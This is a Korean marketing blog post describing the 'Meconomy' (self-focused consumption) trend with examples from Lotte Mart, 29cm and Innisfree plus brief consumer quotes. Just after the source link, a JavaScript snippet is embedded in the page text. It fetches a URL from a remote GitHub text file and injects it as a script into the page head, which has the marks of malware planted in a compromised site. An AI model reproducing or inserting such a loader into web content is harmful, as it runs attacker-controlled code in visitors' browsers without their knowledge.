[#트줍러] 오늘은 ‘미코노미’ 트렌드를 주웠습니다!

세상의 모든 트렌드를 줍다! 트렌드 줍줍러
위픽코퍼레이션
2022-07-06

2022년 06월 13일

세상의 모든 트렌드를 줍다, 트렌드 줍줍러! ?‍♂️

안녕하세요 트렌드 줍줍러입니다. 말랑말랑한 사고?로 크리에이티브한 아이디어⚡ 뿜뿜할 수 있는 마케터로 가는 길!

매주 월요일 트렌드 줍줍러와 함께해요.

오늘의 줍줍 토픽 ‘미(ME)코노미?’ 입니다.

저번 44호 위픽레터에도 언급되었던 트렌드 용어인데요. 1인 가구가 증가하고 있는 현상에 따라 내가 주체가 되는 소비가 떠오르고 있습니다.

소비를 할 때 각자의 취향이나 가치, 생각을 반영해 ‘나’라는 존재가 중심이 되는 것이죠. ‘나를 위한 소비’를 칭하는 미코노미, 지금부터 그 트렌드에 대해서 줍줍 해보겠습니다!

✅프리미엄 과일 품종 확대!, 롯데마트

최근 식품.유통업계에서는 전통 과일류보다 프리미엄, 신품종 같은 이색 과일류의 매출이 더 증가하고 있다고 합니다!

소비자들은 스스로를 위해서 좀 더 맛있고 특별한 과일을 구매하는 것인데요! 롯데마트는 지난해부터 신품종 과일 개발을 하며 11종에 이르는 다양한 이색 신품종 과일을 출시했어요.

출처: 롯데마트 공식 홈페이지

이번 5월에는 2-3주 동안만 수확하는 귀한 품종인 신비 복숭아를 판매하기 시작했습니다! 이렇게 고객에게 다양한 과일 품종에 선택지를 제공하는 것이죠!

✅ 나다운 삶을 찾아드립니다!, 29cm

패션 플랫폼 29cm는 나다운 삶을 찾을 수 있는 오프라인 참여형 캠페인 ‘당신이(2) 구(9)하던 삶’ 이라는 캠페인을 기획했습니다! ‘당신이(2) 구(9)하던 OOO한 삶’이라는 메시지를 고객이 직접 완성할 수 있게 한 고객 참여 이벤트를 오픈했어요.

해당 캠페인은 어떤 삶을 택하던 행복할 수 있다는 메시지를 강조했습니다! 고객들이 스스로 자신의 새로운 라이프 스타일에 대한 영감을 들 수 있게 만들었죠.

✅ ‘나를 위한 메시지’ 를 담다!, 이니스프리

이니스프리는 나를 위한 응원의 메시지를 담은 캐릭터 ‘피너츠’와 콜라보한 미네랄 파우더 제품을 출시했어요! 피너츠 캐릭터들이 ‘내가 원하는 건 뭐든지 할 거야!’, ‘지루한 건 정말 싫어?’ 와 같은 힐링 메시지를 전달해요! 캐릭터들이 건네는 응원의 한마디가 특별함을 주고 위로와 공감의 메시지를 전달해 개인 소장가치를 높였어요!

난 ‘미코노미’를 이렇게 생각해! ‘미코노미’에 대한 한 줄 줍터뷰를 들어보세요!

? ‘나를 위한 간편 한끼’를 꼭 챙기는 ‘직장인 A’

회사가 퇴근 후 집밥하기 힘들잖아요. 그래서 저는 손쉬운 한끼 식사를 위한 소비는 아낌 없이 해요! 밀키트 혹은 쿠킹 박스를 하루 배송시켜서 일주일에 3-4번 정도는 손쉽고 간단하게 먹습니다!

? ‘나’를 테마로 브랜딩 하는 브랜드가 좋아요! ‘패션을 좋아하는 학생 B’

최근 제 스타일과 취향을 존중해 준다는 패션 플랫폼의 카피를 봤는데요. ‘나’에게 초점을 맞춰주는 느낌이 들어 바로 그 플랫폼에서 제품을 구매했어요! 필요에 의한 소비 활동보다는 행복과 만족도에 집중한 소비 활동이 더 즐거워요!

세상의 모든 인사이트를 찾아내기 위해 줍줍러는 쉬지 않고 일하겠습니다! !?‍♂️

지금까지 세상의 모든 트렌드를 줍다! 트렌드 줍줍러 였습니다! 다음 줍토픽도 기대주세요!

[출처 : https://wepick.kr/trend/4336692/]

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)
위픽코퍼레이션의 글 더보기
Elementor #4352262
? 디자인 맛집으로 소문난 이 곳!
애니메이션에 녹아 든 '아시아나 항공'의 맥주 마케팅
무아인, 버추얼 인플루언서의 등장?
'대한민국'을 응원하는 '박카스'의 한마디
세상에서 가장 조용한 CM송, 해태 부라보콘 광고 털기?
마케팅트렌드 더보기
애니메이션에 녹아 든 '아시아나 항공'의 맥주 마케팅
무아인, 버추얼 인플루언서의 등장?
'대한민국'을 응원하는 '박카스'의 한마디
세상에서 가장 조용한 CM송, 해태 부라보콘 광고 털기?
?신입의 고민을 들어주세요!??
회사 다니면서 사이드 프로젝트하고 계시나요?

4335184 인기 이벤트

댓글

링크복사

페이스북

카카오톡